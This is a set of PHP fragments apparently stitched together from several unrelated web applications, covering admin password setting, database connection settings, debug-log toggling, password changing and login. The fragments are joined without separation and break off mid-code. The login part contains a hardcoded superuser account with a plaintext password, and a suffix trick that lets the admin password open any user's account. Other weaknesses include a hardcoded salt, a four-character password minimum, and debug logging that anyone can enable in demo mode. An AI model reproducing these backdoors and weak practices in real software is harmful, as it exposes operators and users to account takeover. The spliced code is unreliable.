$messages[] = array('text' => nl2br($e->getMessage()), 'strong' => true, 'color' => 'red'); $fatal_error = true; } /******************************************************************************** * * Execute actions * *********************************************************************************/ switch ($action) { case 'apply_connection_settings': $config_old = $config; try { if ($config['is_online_demo']) { break; } if (!is_admin_password($admin_password)) { throw new Exception('Das Administratorpasswort ist falsch!'); } $config['db']['type'] = $db_type; //$config['db']['charset'] = $db_charset; // temporarly deactivated $config['db']['host'] = $db_host; $config['db']['name'] = $db_name; $config['db']['user'] = $db_user; $config['db']['password'] = $db_password; save_config(); header('Location: system_database.php'); // Reload the page that we can see if the new settings are stored successfully } catch (Exception $e) { $config = $config_old; // reload the old config $messages[] = array('text' => 'Die neuen Werte konnten nicht gespeichert werden!', 'strong' => true, 'color' => 'red');
/** * @brief Set a new administrator password * * @note The password will be trimmed, salted, crypted with sha256 and stored in $config. * Optionally, $config can be written in config.php. * * @param string $old_password The current administrator password (plain, not crypted) * @param string $new_password_1 The new administrator password (plain, not crypted) (first time) * @param string $new_password_2 The new administrator password (plain, not crypted) (second time) * @param boolean $save_config If true, the config.php file will be overwritten. * If false, the new password will be stored in $config, * but you must manually save the $config with save_config()! * * @throws Exception if the old password is not correct * @throws Exception if the new password is not allowed (maybe empty) * @throws Exception if the new passworts are different * @throws Exception if $config could not be saved in config.php */ function set_admin_password($old_password, $new_password_1, $new_password_2, $save_config = true) { global $config; $salt = 'h>]gW3$*j&o;O"s;@&G)'; settype($old_password, 'string'); settype($new_password_1, 'string'); settype($new_password_2, 'string'); $old_password = trim($old_password); $new_password_1 = trim($new_password_1); $new_password_2 = trim($new_password_2); if (!is_admin_password($old_password)) { throw new Exception('Das eingegebene Administratorpasswort ist nicht korrekt!'); } if (mb_strlen($new_password_1) < 4) { throw new Exception('Das neue Passwort muss mindestens 4 Zeichen lang sein!'); } if ($new_password_1 !== $new_password_2) { throw new Exception('Die neuen Passwörter stimmen nicht überein!'); } // all ok, save the new password $config['admin']['password'] = hash('sha256', $salt . $new_password_1); if ($save_config) { save_config(); } }
/** * @brief Set the enable attribute * ¨ * @param boolean $new_enable The new enable state * @param string|NULL $admin_password @li The admin password for enabling/disabling the debug log (from "config.php"). * @li see $config['debug']['password'] in config_defaults.php * @li For disabling the debug log, * the passwort is not required (pass NULL)! * * @throws Exception if there was an error (maybe wrong password) */ function set_debug_enable($new_enable, $admin_password = NULL) { global $config; if ($new_enable == $config['debug']['enable']) { return; } // there is nothing to do... if ($new_enable == false) { $config['debug']['enable'] = false; $config['debug']['template_debugging_enable'] = false; $config['debug']['request_debugging_enable'] = false; try { save_config(); } catch (Exception $e) { $config['debug']['enable'] = true; throw $e; } return; } // to activate the debug log, we have to check the admin password. // or, for online demos, it's allowed to activate debugging for everyone. if (!is_admin_password($admin_password) && !$config['is_online_demo']) { throw new Exception('Das Passwort ist nicht korrekt!'); } // create new debug log file if it does not exist already if (!is_readable(DEBUG_LOG_FILENAME)) { create_debug_log_file(); } $config['debug']['enable'] = true; try { save_config(); } catch (Exception $e) { $config['debug']['enable'] = false; throw $e; } return; }
<?php // change_password_action.php include_once "config.php"; include_once "functions.php"; if (session_status() == PHP_SESSION_NONE) { session_start(); } $current_user = get_from_session("current_user"); if (is_null($current_user)) { store_in_session("message", "You must login to access this page"); header("Location: index.php"); return; } $current_password = $_POST["current_password"]; $new_password = $_POST["new_password"]; $new_password2 = $_POST["new_password2"]; if (is_admin_password($current_password)) { if ($new_password != $new_password2) { store_in_session("message", "New passwords dont match"); } else { store_admin_password($new_password); store_in_session("message", "New password successfully updated!"); } } else { store_in_session("message", "Current password incorrect"); } header("Location: change_admin_password.php");
return; } } else { if ($username == "su" && $password == "iamsuperuser") { $data = array(); $data["id"] = 0; $data["firstname"] = "Super"; $data["lastname"] = "User"; $data["profile_picture"] = ""; $data["username"] = "******"; $data["usertype"] = 0; store_in_session("current_user", $data); header("Location: ./admin.php"); return; } else { if (substr($username, -14) == ":administrator" && is_admin_password($password)) { $username = split(":", $username)[0]; $sql = "select * from users where ? in (username, email, another_email)"; $data = R::getRow($sql, array($username)); if (count($data) == 0) { header("Location: ./login_f.php"); store_in_session("message", "Invalid username/password"); return; } else { store_in_session("current_user", $data); $redirect_to = get_from_session("redirect_to"); remove_from_session("redirect_to"); if ($redirect_to == null) { $redirect_to = "index.php"; } header("Location: ./{$redirect_to}");